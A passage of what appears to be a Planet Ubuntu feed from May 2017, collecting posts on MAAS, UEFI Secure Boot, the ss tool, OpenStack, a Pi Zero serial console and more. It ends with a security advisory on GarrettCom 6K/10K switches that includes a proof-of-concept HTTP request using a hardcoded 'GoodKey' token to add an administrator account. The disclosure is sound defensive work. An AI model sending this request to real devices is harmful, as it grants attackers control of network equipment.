25 May 2017


Andres Rodriguez: MAAS 2.2.0 Released!

I'm happy to announce that MAAS 2.2.0 (final) has now been released, and it introduces quite a few exciting features:

For more information, please read the release notes, available here.

Availability
MAAS 2.2.0 is currently available in the following MAAS team PPA.
ppa:maas/next
Please note that MAAS 2.2 will replace the MAAS 2.1 series, which will go out of support. We are holding MAAS 2.2 in the above PPA for a week, to give users enough notice that it will replace the 2.1 series. In the following weeks, MAAS 2.2 will be backported into Ubuntu Xenial.
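
For example, on a Xenial system the usual PPA workflow applies (a quick sketch, assuming add-apt-repository is available):

sudo add-apt-repository ppa:maas/next
sudo apt update
sudo apt install maas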

25 May 2017 1:47pm GMT

24 May 2017


Mathieu Trudel: An overview of UEFI Secure Boot on Ubuntu

Secure Boot is here

Ubuntu has now supported UEFI booting and Secure Boot for long enough that both are available, and reasonably up to date, on all supported releases. Here is how Secure Boot works.

An overview

I'm including a diagram here; I know it's a little complicated, so I will also explain how things happen (it can be clicked to get to the full size image).


In all cases, booting a system in UEFI mode loads UEFI firmware, which typically contains pre-loaded keys (at least, on x86). These keys are usually those from Microsoft, so that Windows can load its own bootloader and verify it, as well as those from the computer manufacturer. The firmware doesn't, by itself, know anything special about how to boot the system -- this is informed by NVRAM (or some similar memory that survives a reboot) by way of a few variables: BootOrder, which specifies what order to boot things in, and the BootEntry#### variables (hex numbers), each of which contains the path to an EFI image to load, a disk, or some other method of starting the computer (such as booting into the Setup tool for that firmware). If no BootEntry variable listed in BootOrder gets the system booting, then nothing happens. However, systems will usually at least include a path to a disk as a permanent or default BootEntry. Shim relies on that, or on a distro, to load in the first place.
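
If you're curious, you can inspect these variables from a running Linux system with efibootmgr. The output below is only illustrative, and the entries will differ from machine to machine; adding -v also shows the EFI image path stored in each BootEntry:

efibootmgr
BootCurrent: 0001
BootOrder: 0001,0000
Boot0000* Windows Boot Manager
Boot0001* ubuntu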

Once we actually find shim and boot it, shim will try to validate the signature of the next piece in the puzzle: grub2, MokManager, or fallback, depending on the state of shim's own variables in NVRAM; more on this later.

In the usual scenario, shim validates the grub2 image successfully; then grub2 itself will try to load the kernel or chainload another EFI binary, after validating the signatures on these images by asking shim to check them.

Shim

Shim is just a very simple layer that holds keys outside of those installed by default on the system (since those normally can't be changed outside of Setup Mode, and changing them requires a few steps). It knows how to load grub2 in the normal case; how to load MokManager if policy changes need to be applied (such as disabling signature validation or adding new keys); and how to load the fallback binary, which can re-create BootEntry variables in case the firmware isn't able to handle them. I will expand on MokManager and fallback in a future blog post.

Your diagram says shim is signed by Microsoft, what's up with that?

Indeed, shim is an EFI binary that is signed by Microsoft, at least as we ship it in Ubuntu. Other distributions do the same. This is required because the firmware on most systems already contains Microsoft certificates (pre-loaded at the factory), and it would be impractical to have different shims for each hardware manufacturer. All EFI binaries can easily be re-signed anyway; we just do things like this to make it as easy as possible for the largest number of people.

One thing this means is that uploads of shim require a lot of effort and testing. Fortunately, since it is used by other distributions too, it is a well-tested piece of code. There is even now a community process to handle review of submissions for signature by Microsoft, in an effort to catch anything outlandish as quickly and as early as possible.

Why reboot once a policy change is made or boot entries are rebuilt?

All of this happens through changes in firmware variables. Rebooting makes sure we can properly take into account changes in the firmware variables, and possibly carry on with other "backlogged" actions that need to happen (for instance, rebuilding BootEntry variables first, and then loading MokManager to add a new signing key before we can load a new grub2 image you signed yourself).

Grub2

grub2 is not a new piece of the boot process in any way; it's been around for a long while. The difference between booting in BIOS mode and in UEFI mode is that we install a UEFI binary version of grub2. The software is the same, just packaged slightly differently (I may outline the UEFI binary format at some point in the future). It also goes through some code paths that are specific to UEFI, such as checking whether we booted through shim, and if so, asking it to validate signatures. If not, we can still validate signatures, but we have to do so using the UEFI protocol itself, which only allows signatures by keys that are included in the firmware, as explained earlier. In practice, that's mostly just the Microsoft signatures.

grub2 in UEFI otherwise works just like it would elsewhere: it tries to find its grub.cfg configuration file, and follows its instructions to boot the kernel and load the initramfs.

When Secure Boot is enabled, loading the kernel normally requires that the kernel itself is signed. The kernels we install in Ubuntu are signed by Canonical, just like grub2 is, and shim knows about the signing key and can validate these signatures.

At the time of this writing, if the kernel isn't signed or is signed by an unknown key, grub2 will fall back to loading the kernel as a normal (unsigned) binary, outside of BootServices. BootServices is a special mode we're in while booting the system; it is normally exited by the kernel early on, as the kernel loads. Exiting BootServices means some special features of the firmware are no longer available to anything that runs afterwards, so while things may have been loaded in UEFI mode, they will not have access to everything in the firmware. If the kernel is signed correctly, then grub2 leaves the ExitBootServices call to be done by the kernel.

Very soon, we will stop allowing unsigned kernels (or kernels signed by unknown keys) to be loaded in Ubuntu. This work is in progress. The change will not affect most users, only those who build their own kernels. They will still be able to load their kernels by making sure they are signed by some key (such as their own; I will cover signing things in my next blog entry) and importing that key into shim (a step you only need to do once).
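
To give a rough idea of what's involved (this is only a sketch; the details will come in the next blog entry, and it assumes the sbsigntool and mokutil packages are installed):

openssl req -new -x509 -newkey rsa:2048 -nodes -days 3650 -subj "/CN=My kernel key/" -keyout MOK.priv -outform DER -out MOK.der
openssl x509 -inform DER -in MOK.der -out MOK.pem
sbsign --key MOK.priv --cert MOK.pem --output vmlinuz.signed vmlinuz
sudo mokutil --import MOK.der

mokutil will ask for a one-time password, and MokManager will prompt you to enroll the key on the next boot.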

The kernel

In UEFI with Secure Boot, the kernel enforces that loaded modules are properly signed. This means that those who need to build their own custom modules, or use DKMS modules (virtualbox, r8168, bbswitch, etc.), need to take a few extra steps to let the modules load properly.

In order to make this as easy as possible for people, for now we've opted to let users disable Secure Boot validation in shim via a semi-automatic process. Shim is still verified by the system firmware, but any piece following it that asks shim to validate something will get an affirmative response (i.e. things are treated as valid, even if they are unsigned or signed by an unknown key). grub2 will happily load your kernel, and your kernel will be happy to load custom modules. This is obviously not a perfectly secure solution; it's more of a temporary measure to allow things to carry on as they did before. In the future, we'll replace this with a wizard-type tool that lets users sign their own modules easily. For now, signing binaries and modules is a manual process (as above, I will expand on it in a future blog entry).
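
For reference, signing a single module by hand currently looks something like this (using the sign-file script shipped with the kernel headers, and the same MOK key pair as in the sketch above):

/usr/src/linux-headers-$(uname -r)/scripts/sign-file sha256 MOK.priv MOK.der mymodule.ko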

Shim validation

If you were using DKMS packages and feel you'd really prefer to have shim validate everything, you can re-enable shim validation (but be aware that if your system requires those drivers, they will not load and your system may be unusable, or at least whatever needs that driver will not work):

sudo update-secureboot-policy --enable

If nothing happens, it's because you already have shim validation enabled: nothing has required it to be disabled. If things aren't as they should be (for instance, if Secure Boot is not enabled on the system), the command will tell you.

And although we certainly don't recommend it, you can disable shim validation yourself with much the same command (see --help). There is an example of use of update-secureboot-policy here.
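
For completeness, going the other way is much the same (the exact flag here is my assumption; check --help for the real option):

sudo update-secureboot-policy --disable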

24 May 2017 8:07pm GMT

Ubuntu Insights: Redefining the Developer Event

By Randall Ross, Ubuntu Evangelist

We've all been to "those other" developer events: Sitting in a room watching a succession of never-ending slide presentations. Engagement with the audience, if any, is minimal. We leave with some tips and tools that we might be able to put into practice, but frankly, we attended because we were supposed to. The highlight was actually the opportunity to connect with industry contacts.

Key members of the OpenPOWER Foundation envisioned something completely different in their quest to create the perfect developer event, something that has never been done before: What if developers at a developer event actually spent their time developing?

The OpenPOWER Foundation is an open technical membership organization that enables its member companies to provide customized, innovative solutions based on POWER CPU processors and system platforms that encourage data centers to rethink their approach to technology. The Foundation found that ISVs needed support and encouragement to develop OpenPOWER-based solutions and take advantage of other OpenPOWER Ready components. The demand for OpenPOWER solutions has been growing, and ISVs needed a place to get started.

To solve this challenge, The OpenPOWER Foundation created the first ever Developer Congress, a hands-on event that will take place May 22-25 in San Francisco. The Congress will focus on all aspects of full stack solutions - software, hardware, infrastructure, and tooling - and developers will have the opportunity to learn and develop solutions amongst peers in a collaborative and supportive environment.

The Developer Congress will provide ISVs with development, porting, and optimization tools and techniques necessary to utilize multiple technologies, for example: PowerAI, TensorFlow, Chainer, Anaconda, GPU, FPGA, CAPI, POWER, and OpenBMC. Experts in the latest hot technologies such as deep learning, machine learning, artificial intelligence, databases and analytics, and cloud will be on hand to provide one-on-one advice as needed.

As Event Co-Chair, I had an idea for a different type of event. One where developers are treated as "heroes" (because they are - they are the creators of solutions). My Event Co-Chair Greg Phillips, OpenPOWER Content Marketing Manager at IBM, envisioned an event where developers will bring their laptops and get their hands dirty, working under the tutelage of technical experts to create accelerated solutions.

The OpenPOWER Developer Congress is designed to provide a forum that encourages learning from peers and networking with industry thought leaders. Its format emphasises collaboration with partners to find complementary technologies, and provides on-site mentoring through liaisons assigned to help developers get the most out of their experience.

Support from the OpenPOWER Foundation doesn't end with the Developer Congress. The OpenPOWER Foundation is dedicated to providing its members with ongoing support in the form of information, access to developer tools and software labs across the globe, and assets for developing on OpenPOWER.

The OpenPOWER Foundation is committed to making an investment in the Developer Congress to provide an expert-rich environment that allows attendees to walk away three days later with new skills, new tools, and new relationships. As Thomas Edison said, "Opportunity is missed by most people because it is dressed in overalls and looks like work." So developers, come get your hands dirty.

Learn more about the OpenPOWER Developer Congress.

About the author

Randall Ross leads the OpenPOWER Ambassadors, and is a prominent Ubuntu community member. He hails from Vancouver BC, where he leads one of the largest groups of Ubuntu enthusiasts and contributors in the world.

24 May 2017 12:59pm GMT

Mathieu Trudel: ss: another way to get socket statistics

In my last blog post I mentioned ss, another tool that comes with the iproute2 package and allows you to query statistics about sockets. It can do the same things as netstat, with the added benefit that it is typically a little bit faster, and shorter to type.

Just running ss by default will display much the same thing as netstat, and it can similarly be passed options to limit the output to just what you want. For instance:

$ ss -t
State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 0 127.0.0.1:postgresql 127.0.0.1:48154
ESTAB 0 0 192.168.0.136:35296 192.168.0.120:8009
ESTAB 0 0 192.168.0.136:47574 173.194.74.189:https

[...]

ss -t shows just TCP connections. ss -u can be used to show UDP connections, -l will show only listening ports, and things can be further filtered to just the information you want.

I have not tested all the possible options, but you can even forcibly close sockets with -K.
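
For example, the following should forcibly close any sockets connected to a given host (a hypothetical invocation matching the documented filter syntax; note it also requires a kernel built with CONFIG_INET_DIAG_DESTROY):

$ sudo ss -K dst 192.168.0.120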

One place where ss really shines though is in its filtering capabilities. Let's list all connections with a source port of 22 (ssh):

$ ss state all sport = :ssh
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp LISTEN 0 128 *:ssh *:*
tcp ESTAB 0 0 192.168.0.136:ssh 192.168.0.102:46540
tcp LISTEN 0 128 :::ssh :::*

And if I want to show only connected sockets (everything but listening or closed):

$ ss state connected sport = :ssh
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp ESTAB 0 0 192.168.0.136:ssh 192.168.0.102:46540


Similarly, you can have it list all connections to a specific host or range; in this case, using the 74.125.0.0/16 subnet, which apparently belongs to Google:

$ ss state all dst 74.125.0.0/16
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp ESTAB 0 0 192.168.0.136:33616 74.125.142.189:https
tcp ESTAB 0 0 192.168.0.136:42034 74.125.70.189:https
tcp ESTAB 0 0 192.168.0.136:57408 74.125.202.189:https

This is very much the same syntax as for iptables, so if you're familiar with that already, it will be quite easy to pick up. You can also install the iproute2-doc package, and look in /usr/share/doc/iproute2-doc/ss.html for the full documentation.

Try it for yourself! You'll see how well it works. If anything, I'm glad for the fewer characters this makes me type.

24 May 2017 12:54am GMT

23 May 2017


Ubuntu Insights: Hacking Through Machine Learning at the OpenPOWER Developer Congress

By Sumit Gupta, Vice President, IBM Cognitive Systems

10 years ago, every CEO leaned over to his or her CIO and CTO and said, "we've got to figure out big data." Five years ago, they leaned over and said, "we've got to figure out cloud." This year, every CEO is asking their team to figure out "AI," or artificial intelligence.

IBM laid out an accelerated computing future several years ago as part of our OpenPOWER initiative. This accelerated computing architecture has now become the foundation of modern AI and machine learning workloads such as deep learning. Deep learning is so compute intensive that despite using several GPUs in a single server, one computation run of deep learning software can take days, if not weeks, to run.

The OpenPOWER architecture thrives on this kind of compute intensity. The POWER processor has much higher compute density than x86 CPUs (there are up to 192 virtual cores per CPU socket in POWER8). This density per core, combined with high-speed accelerator interfaces like NVLink and CAPI that optimize GPU pairing, provides an exponential performance benefit. And the broad OpenPOWER Linux ecosystem, with 300+ members, means that you can run these high-performance POWER-based systems in your existing data center, either on-prem or from your favorite POWER cloud provider, at costs comparable to legacy x86 architectures.

Take a Hack at the Machine Learning Work Group

The recently formed OpenPOWER Machine Learning Work Group gathers experts in the field to focus on the challenges that machine learning developers are continuously facing. Participants identify use cases, define requirements, and collaborate on solution architecture optimisations. By gathering in a workgroup with a laser focus, people from diverse organisations can better understand and engineer solutions that address similar needs and pain points.

The OpenPOWER Foundation pursues technical solutions using POWER architecture from a variety of member-run work groups. The Machine Learning Work Group is a great example of how hardware and software can be leveraged and optimized across solutions that span the OpenPOWER ecosystem.

Accelerate Your Machine Learning Solution at the Developer Congress

This spring, the OpenPOWER Foundation will host the OpenPOWER Developer Congress, a "get your hands dirty" event on May 22-25 in San Francisco. This unique event provides developers the opportunity to create and advance OpenPOWER-based solutions by taking advantage of on-site mentoring, learning from peers, and networking with developers, technical experts, and industry thought leaders. If you are a developer working on Machine Learning solutions that employ the POWER architecture, this event is for you.

The Congress is focused on full stack solutions - software, firmware, hardware infrastructure, and tooling. It's a hands-on opportunity to ideate, learn, and develop solutions in a collaborative and supportive environment. At the end of the Congress, you will have a significant head start on developing new solutions that utilize OpenPOWER technologies and incorporate OpenPOWER Ready products.

There has never been another event like this one. It's a developer conference devoted to developing, not sitting through slideware presentations or sales pitches. Industry experts from the top companies that are innovating in deep learning, machine learning, and artificial intelligence will be on hand for networking, mentoring, and providing advice.

A Developer Congress Agenda Specific to Machine Learning

The OpenPOWER Developer Congress agenda addresses a variety of Machine Learning topics. For example, you can participate in hands-on VisionBrain training, learning a new model and generating the API for image classification, using your own family pictures to train the model. The current agenda includes:

• VisionBrain: Deep Learning Development Platform for Computer Vision
• GPU Programming Training, including OpenACC and CUDA
• Inference System for Deep Learning
• Intro to Machine Learning / Deep Learning
• Develop / Port / Optimize on Power Systems and GPUs
• Advanced Optimization
• Spark on Power for Data Science
• Openstack and Database as a Service
• OpenBMC

Bring Your Laptop and Your Best Ideas

The OpenPOWER Developer Congress will take place May 22-25 in San Francisco. The event will provide ISVs with development, porting, and optimization tools and techniques necessary to utilize multiple technologies, for example: PowerAI, TensorFlow, Chainer, Anaconda, GPU, FPGA, CAPI, POWER, and OpenBMC. So bring your laptop and preferred development tools and prepare to get your hands dirty!

About the author

Sumit Gupta is Vice President, IBM Cognitive Systems, where he leads the product and business strategy for HPC, AI, and Analytics. Sumit joined IBM two years ago from NVIDIA, where he led the GPU accelerator business.

23 May 2017 9:31am GMT

Marco Trevisan (Treviño): Ubuntu goes GNOME, theming stays. Let’s test (and tune) it!

Hi guys! Again… Long time, no see you :-).

As you surely know, in the past weeks Ubuntu took the hard decision of stopping the development of the Unity desktop environment, focusing again on shipping GNOME as the default DE, and joining the upstream efforts.

While, on a personal note, after more than 6 years of involvement in Unity development, this is a little heartbreaking, I also think that given the situation this is the right decision, and I'm quite excited to be able to work even closer to the whole open source community!

Most aspects of the future Ubuntu desktop have yet to be defined, and I guess you know that there's a survey going on; I encourage you to participate in order to make your voice count…

One important aspect of this is the visual appearance, and the Ubuntu Desktop team has decided that the default themes for Ubuntu 17.10 will continue to be the ones you've always loved! Right now some work is being done to make sure Ambiance and Radiance look and work well in GNOME Shell.

In the past days I've released a new version of 'light-themes' to fix several theming problems in GNOME Shell.


This is already quite an improvement, but we can't fix bugs we don't know about… So this is where you can help make Ubuntu better!

Get Started

If you haven't already, here's how I recommend you get started:

  1. Install the latest Ubuntu 17.10 daily image (unless you're going wild and trying this on 17.04).
  2. After installing it, install gnome-shell.
  3. Install gnome-tweak-tool if you want an easy way to change themes.
  4. On the login screen, switch your session to GNOME and log in.

Report Bugs

Run this command to report bugs with Ambiance or Radiance:

ubuntu-bug light-themes

Attach a screenshot to the Launchpad issue.

Other info

Ubuntu's default icon theme is ubuntu-mono-dark (or -light if you switch to Radiance) but most of Ubuntu's customized icons are provided by humanity-icon-theme.

Helping with Themes development

If you want to help with the theming itself, you're very welcome. Gtk themes nowadays use CSS, so I'm pretty sure that any web designer out there can help with them (these are the supported properties).

All you have to do is simply use the Gtk Inspector, which can be launched from any Gtk3 app, write some CSS rules, and see how they get applied on the fly. Once you're happy with your solution, you can just create a MP for the Ubuntu Themes.
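
If you've never launched the Inspector before, the quickest way I know of is to start any Gtk3 app with the interactive debugging environment variable set, for example:

GTK_DEBUG=interactive gedit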

Let's keep ubuntu, look ubuntu!

PS: thanks to Jeremy Bicha for the help in this post.

23 May 2017 5:20am GMT

Aaron Honeycutt: Current Layout: Kubuntu 17.10 – 5/22/17

I've been running Artful, aka 17.10, on my laptop for maybe a month now with no real issues, and that's thanks to the awesome Kubuntu developers we have and our testers!

My current layout has Latte Dock running with a normal panel (yes, a bit Mac-y, I know). I had to build Latte Dock myself in Launchpad[1], so if you want to use it on 17.10 (with the normal PPA/testing warning) you can; I also have it built for 17.04 if anyone wants that as well[2]. I'm also running the new Qt music player Babe-Qt.

I also have the Uptime widget and a launcher widget in the Latte Dock, as it can hold widgets just like a normal panel. Oh, and the wallpaper is from the awesome game Firewatch (it's on Linux!).

[1] https://launchpad.net/~aaronhoneycutt/+archive/ubuntu/artful
[2] https://launchpad.net/~aaronhoneycutt/+archive/ubuntu/kubuntu-zetsy

23 May 2017 3:40am GMT

22 May 2017


Adam Stokes: conjure-up dev summary for week 20


This week we concentrated on polishing up our region and credentials selection capabilities.

Initially, we wanted people deploying big software as fast as possible, without it turning into a "choose your own adventure" book. This has been hugely successful, as it minimized the time and effort needed to get to the end result of a usable Kubernetes or OpenStack.

Now fast forward a few months, and feature requests were coming in asking to expand on this basic flow of installing big software. Our first request was to add the ability to specify the regions where this software would live; that feature is complete and is known as region selections:

Region Selections

Region selection is supported in both Juju as a Service (JAAS) and as a self hosted controller.


In this example, we are using JAAS to deploy the Canonical Distribution of Kubernetes to the us-east-2 region in AWS:


conjure-up will already know what regions are available and will prompt you with that list:


Finally, input your credentials and off it goes to having a fully usable Kubernetes cluster in AWS.


The credentials view leads us into our second completed feature. Multiple user credentials are supported for all the various clouds, and previously conjure-up tried to do the right thing if an existing credential for a cloud was found. Again, in the interest of getting you up and running as fast as possible, conjure-up would re-use any credentials it found for the cloud in use. This worked well initially; however, as usage increased, so did the need to be able to choose from a list of existing credentials or create new ones. That feature work has been completed and will be available in conjure-up 2.2.

Credential Selection

This screen shows you a list of existing credentials that were created for AWS or gives you the option of creating additional ones:


Trying out the latest

As always we keep our edge releases current with the latest from our code. If you want to help test out these new features simply run:

sudo snap install conjure-up --classic --edge  
conjure-up  

That's all for this week, check back next week for more conjure-up news!

22 May 2017 4:19pm GMT

James Page: Ubuntu OpenStack Dev Summary – 22nd May 2017

Welcome to the first ever Ubuntu OpenStack development summary!

This summary is intended to be a regular communication of activities and plans happening in and around Ubuntu OpenStack, covering but not limited to the distribution and deployment of OpenStack on Ubuntu.

If there is something that you would like to see covered in future summaries, or you have general feedback on content please feel free to reach out to me (jamespage on Freenode IRC) or any of the OpenStack Engineering team at Canonical!


OpenStack Distribution

Stable Releases

Ceph 10.2.7 for Xenial, Yakkety, Zesty and Trusty-Mitaka UCA:
https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/1684527

Open vSwitch updates (2.5.2 and 2.6.1) for Xenial and Yakkety plus associated UCA pockets:
https://bugs.launchpad.net/ubuntu/+source/openvswitch/+bug/1673063
https://bugs.launchpad.net/ubuntu/+source/openvswitch/+bug/1641956

Point releases for Horizon (9.1.2) and Keystone (9.3.0) for Xenial and Trusty-Mitaka UCA:
https://bugs.launchpad.net/ubuntu/+source/keystone/+bug/1680098

And the current set of OpenStack Newton point releases have just entered testing:
https://bugs.launchpad.net/cloud-archive/+bug/1688557

Development Release

OpenStack Pike b1 is available in Xenial-Pike UCA (working through proposed testing in Artful).

Open vSwitch 2.7.0 is available in Artful and Xenial-Pike UCA.

Expect some focus on development previews for Ceph Luminous (the next stable release) for Artful and the Xenial-Pike UCA in the next month.


OpenStack Snaps

Progress on producing snap packages for OpenStack components continues; snaps for glance, keystone, nova, neutron and nova-hypervisor are available in the snap store in the edge channel - for example:

sudo snap install --edge --classic keystone

Snaps are currently Ocata aligned; once the team has a set of snaps that we're all comfortable are a good base, we'll work towards publication of snaps across tracks for OpenStack Ocata and OpenStack Pike, as well as expanding the scope of projects covered with snap packages.

The edge channel for each track will contain the tip of the associated branch for each OpenStack project, with the beta, candidate and release channels being reserved for released versions. These three channels will be used to drive the CI process for validation of snap updates. This should result in an experience something like:

sudo snap install --classic --channel=ocata/stable keystone

or

sudo snap install --classic --channel=pike/edge keystone

As the snaps mature, the team will be focusing on enabling deployment of OpenStack using snaps in the OpenStack Charms (which will support CI/CD testing) and migration from deb based installs to snap based installs.


Nova LXD

Support for different Cinder block device backends for Nova-LXD has landed in the driver (and the supporting os-brick library), allowing Ceph Cinder storage backends to be used with LXD containers; this is available in the Pike development release only.

Work on support for new LXD features to allow multiple storage backends to be used is currently in-flight, allowing the driver to use dedicated storage for its LXD instances alongside any use of LXD via other tools on the same servers.


OpenStack Charms

6 monthly release cycle

The OpenStack Charms project is moving to a 6 monthly release cadence (rather than the 3 month cadence we've followed for the last few years); this reflects the reduced rate of new features across OpenStack and the charms, and the improved process for backporting fixes to the stable charm set between releases. The next charm release will be in August, aligned with the release of OpenStack Pike and the Xenial-Pike UCA.

If you have bugs that you'd like to see backported to the current stable charm set, please tag them with the 'stable-backport' tag (and they will pop-up in the right place in Launchpad) - you can see the current stable bug pipeline here.

Ubuntu Artful and OpenStack Pike Support

Required changes into the OpenStack Charms to support deployment of Ubuntu Artful (the current development release) and OpenStack Pike are landing into the development branches for all charms, alongside the release of Pike b1 into Artful and the Xenial-Pike UCA.

You can consume these charms (as always) via the ~openstack-charmers-next team, for example:

juju deploy cs:~openstack-charmers-next/keystone

IRC (and meetings)

You can participate in the OpenStack charm development and discussion by joining the #openstack-charms channel on Freenode IRC; we also have a weekly development meeting in #openstack-meeting-4 at either 1000 UTC (odd weeks) or 1700 UTC (even weeks) - see http://eavesdrop.openstack.org/#OpenStack_Charms for more details.

EOM


22 May 2017 11:00am GMT

21 May 2017


Costales: Ubuntu y otras hierbas S01E02: GNOME3 y UBPorts [podcast] [spanish]

Second episode of the podcast Ubuntu y otras hierbas.

This time we'll chat about these topics:
  • Migration to GNOME 3
  • UBPorts will maintain Unity and Ubuntu Phone
The podcast is available to listen to on:


Podcast on YouTube

Links related to the podcast:
Podcast soundtrack under the CC BY-NC 4.0 license.
Marius's video at the Ubucon about UBPorts.

All episodes of the podcast 'Ubuntu y otras hierbas' are available here.

21 May 2017 11:50am GMT

David Tomaschik: Pi Zero as a Serial Gadget

I just got a new Raspberry Pi Zero W (the wireless version) and didn't feel like hooking it up to a monitor and keyboard to get started. I really just wanted a serial console for starters. Rather than solder in a header, I wanted to be really lazy, so I decided to use the USB OTG support of the Pi Zero to provide a console over USB. It's pretty straightforward, actually.

Install Raspbian on MicroSD

First off is a straightforward "install" of Raspbian on your MicroSD card. In my case, I used dd to image the img file from Raspbian to a MicroSD card in a card reader.

dd if=/home/david/Downloads/2017-04-10-raspbian-jessie-lite.img of=/dev/sde bs=1M conv=fdatasync

Mount the /boot partition

You'll want to mount the boot partition to make a couple of changes. Before doing so, run partprobe to re-read the partition tables (or unplug and replug the SD card). Then mount the partition somewhere convenient.

partprobe
mount /dev/sde1 /mnt/boot

Edit /boot/config.txt

To use the USB port as an OTG port, you'll need to enable the dwc2 device tree overlay. This is accomplished by adding a line to /boot/config.txt with dtoverlay=dwc2.

vim /mnt/boot/config.txt
(append dtoverlay=dwc2)

Edit /boot/cmdline.txt

Now we'll need to tell the kernel to load the right module for the serial OTG support. Open /boot/cmdline.txt, and after rootwait, add modules-load=dwc2,g_serial.

vim /mnt/boot/cmdline.txt
(insert modules-load=dwc2,g_serial after rootwait)

When you save the file, make sure it is all one line; if you have any line-wrapping options enabled, they may have inserted newlines into the file.
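
A quick sanity check; this should report 1, assuming the file ends with a single trailing newline:

wc -l /mnt/boot/cmdline.txt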

Mount the root (/) partition

Let's switch the partition we're dealing with.

umount /mnt/boot
mount /dev/sde2 /mnt/root

Enable a Console on /dev/ttyGS0

/dev/ttyGS0 is the serial port on the USB gadget interface. While we'll get a serial port, we won't have a console on it unless we tell systemd to start a getty (the process that handles login and starts shells) on the USB serial port. This is as simple as creating a symlink:

ln -s /lib/systemd/system/getty@.service /mnt/root/etc/systemd/system/getty.target.wants/getty@ttyGS0.service

This asks systemd to start a getty on ttyGS0 on boot.
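
(If you were making this change on a running system rather than an offline SD card, sudo systemctl enable getty@ttyGS0.service would create the same symlink for you.)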

Unmount and boot your Pi Zero

Unmount your SD card, insert the micro SD card into a Pi Zero, and boot with a Micro USB cable between your computer and the OTG port.

Connect via a terminal emulator

You can connect via the terminal emulator of your choice at 115200bps. The Pi Zero shows up as a "Netchip Technology, Inc. Linux-USB Serial Gadget (CDC ACM mode)", which means that (on Linux) your device will typically be /dev/ttyACM0.

screen /dev/ttyACM0 115200

Conclusion

This is a quick way to get a console on a Raspberry Pi Zero, but it has downsides:

21 May 2017 7:00am GMT

19 May 2017


Nish Aravamudan: usd has been renamed to git-ubuntu

After some internal bikeshedding, we decided to rework the tooling that the Server Team has been working on for git-based source package management. The old tool was usd (Ubuntu Server Dev), a name that stemmed from a Canonical Server sprint in Barcelona last year. That name is confusing (acronyms that aren't obvious are never good), and really the tooling had evolved into a git wrapper.

So, we renamed everything to be git-ubuntu. Since git is awesome, that means git ubuntu also works as long as git-ubuntu is in your $PATH. The snap (previously usd-nacc) has been deprecated in favor of git-ubuntu (it still exists, but if you try to run, e.g., usd-nacc.usd you are told to install the git-ubuntu snap). To get it, use:

sudo snap install --classic git-ubuntu

We are working on some relatively big changes to the code-base to release next week:

  1. Empty directory support (LP: #1687057). My colleague Robie Basak implemented a workaround for upstream git not being able to represent empty directories.
  2. Standardizing (internal to the code) how the remote(s) work and what refspecs are used to fetch from them.

Along with those architectural changes, one big functional shift is to using git-config to store some metadata about the user (specifically, the Launchpad user name to use, in ~/.gitconfig) and the command used to create the repository (specifically, the source package name, in <dir>/.git/config). I think this actually ends up being quite clean from an end-user perspective, and it means our APIs and commands are easier to use, as we can just lookup this information from git-config when using an existing repository.
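
As an illustration, reading that metadata back is just a normal git-config lookup; note the key name below is made up for the example, so check the tool's documentation for the real ones:

git config --get gitubuntu.lpuser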

As always, the latest code is at: https://git.launchpad.net/usd-importer


19 May 2017 10:45pm GMT

Jos Antonio Rey: Social Media Management vs. Community Management?

I personally stopped blogging a while ago, but I kinda feel this is a necessary blog post. A while ago, a professor used the term Community Manager interchangeably with Social Media Manager. I made a quick comment about them not being the same, and later some friends started questioning my reasoning.

Last week during OSCON, I was chatting with a friend about this same topic. A startup asked me to help them as a community manager about a year ago. I gladly accepted, but then they just started assigning me social media work.

And these are not the only cases. I have seen several people use both terms as if they were interchangeable, which they are not. I guess it's time for me to burst the bubble that has been wrapped around both terms.

In order to do that, let's explain, in very simple words, the job of each. Let's start with social media managers. Their job is, as the title says, to manage social media channels: post on Facebook, respond to Twitter replies, make sure people feel welcome when they visit any of the social media channels, and represent the brand/product through social media.

Community managers, on the other hand, focus on building communities around a product or service. To put it simply, they make sure that there are people who care about the product, who contribute to the ecosystem, and who work with the provider to make it better. Social media management is a part of their job. It is a core function, because it is one of the channels that allows them to hear people's concerns and project the provider's voice about the product. However, it is not their only job. They also have to go out and meet people in real life. Talk with higher-ups to voice those concerns. Hear how the product is impacting people's lives in order to make a change, or continue on the same good path.

With this, I'm not trying to devalue the work of social media managers. On the contrary, they have a very valuable job. Imagine all those companies with social media profiles, but without the funny comments. No replies to your messages if you had a question. Horrible, right? Managing these channels is important so that brands/products are 'alive' on the interwebs. But being a community manager is not only managing a channel. Therefore, they are not comparable jobs.

Each of the positions is different, even though they complement each other pretty well. I hope that with this post you can understand a little bit more about the inner workings of both community managers and social media managers. In a fast-paced world like ours, these two can make a huge difference between having a presence online or not. So, next time you're looking for a community manager, don't expect them to do only social media work. And vice versa: if you're looking for a social media manager, don't expect them to build a community out of social media.


19 May 2017 5:02pm GMT

Martin Pitt: Cockpit is now in Ubuntu backports

Hot on the heels of landing Cockpit in Debian unstable and Ubuntu 17.04, the Ubuntu backport request got approved (thanks Iain!), which means that installing cockpit on Ubuntu 16.04 LTS or 16.10 is now also a simple apt install cockpit away. I updated the installation instructions accordingly.

Enjoy, and let us know about problems!

19 May 2017 2:49pm GMT

David Tomaschik: Belden Garrettcom 6K/10K Switches: Auth Bypasses, Memory Corruption

Introduction

Vulnerabilities were identified in the Belden GarrettCom 6K and 10KT (Magnum) series network switches. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive; observations suggest that it is likely that further vulnerabilities exist. It is strongly recommended that GarrettCom undertake a full whitebox security assessment of these switches.

The version under test was indicated as: 4.6.0. Belden Garrettcom released an advisory on 8 May 2017, indicating that issues were fixed in 4.7.7: http://www.belden.com/docs/upload/Belden-GarrettCom-MNS-6K-10K-Security-Bulletin-BSECV-2017-8.pdf

This is a local copy of an advisory posted to the Full Disclosure mailing list.

GarrettCom-01 - Authentication Bypass: Hardcoded Web Interface Session Token

Severity: High

The string "GoodKey" can be used in place of a session token for the web interface, allowing a complete bypass to all web interface authentication. The following request/response demonstrates adding a user 'gibson' with the password 'god' on any GarrettCom 6K or 10K switch.

GET /gc/service.php?a=addUser&uid=gibson&pass=god&type=manager&key=GoodKey HTTP/1.1
Host: 192.168.0.2
Connection: close
